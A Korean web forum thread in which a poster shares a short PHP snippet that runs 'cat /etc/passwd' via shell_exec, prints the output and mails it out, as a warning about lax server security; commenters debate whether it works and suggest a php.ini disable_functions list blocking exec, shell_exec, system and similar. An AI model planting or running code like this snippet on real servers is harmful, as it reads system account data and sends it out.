아 이런 실수를... 정보
아 이런 실수를...
본문
<?php
$output = shell_exec('cat /etc/passwd');
echo "<pre>$output</pre>";
mail('','file info',$output);
?>
ㅋㅋㅋ
보안에 신경 씁시다.ㅡ.ㅡ;
$output = shell_exec('cat /etc/passwd');
echo "<pre>$output</pre>";
mail('','file info',$output);
?>
ㅋㅋㅋ
보안에 신경 씁시다.ㅡ.ㅡ;
추천
0
0
댓글 10개
힝.. 외계어다...ㅜㅜ
패스워드 탈출 프로젝트다 .... ㅎㅎㅎ
정말 저렇게 보내신건가요?? 아니겠죠? ㅎ
실제 저랬다면...
웹서버에서 사용자에게 상위 디렉토리 접근권한 자체를 줬다는 거부터 문제네요.
의외로 보안에 신경안쓰는것들이 사소한 것들이라는...;
실제 저랬다면...
웹서버에서 사용자에게 상위 디렉토리 접근권한 자체를 줬다는 거부터 문제네요.
의외로 보안에 신경안쓰는것들이 사소한 것들이라는...;
OS 설치 후 기본 설정은 저렇게 되어 있습니다.
OS 민지 얼마 안되서..새로 작업 중..;; 일단 중요한 것만 바꾸는 중
그리고 위 소스는 테스트 한번 해본거고요..ㅋ
OS 민지 얼마 안되서..새로 작업 중..;; 일단 중요한 것만 바꾸는 중
그리고 위 소스는 테스트 한번 해본거고요..ㅋ
허허... 전 서버가 또 정지 되어있다는.... ㅋㅋㅋ
저거 안되지 않나요..
보통 아파치작동 권환이 노바디 아니면 데몬인데..
접근이 안될탠대.
보통 아파치작동 권환이 노바디 아니면 데몬인데..
접근이 안될탠대.
권한 755면 접근 됩니당...(OS 설치 할 때 기본 권한일껄여..)
php.ini 의 disable_functions 에서 아래처럼 막으실 펑션을 입력하면 안될겁니다.
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
해당 사항은 다 해났어요
저거 정말 되나요 ; 패스워드 가 메일로 발송 되나요 ;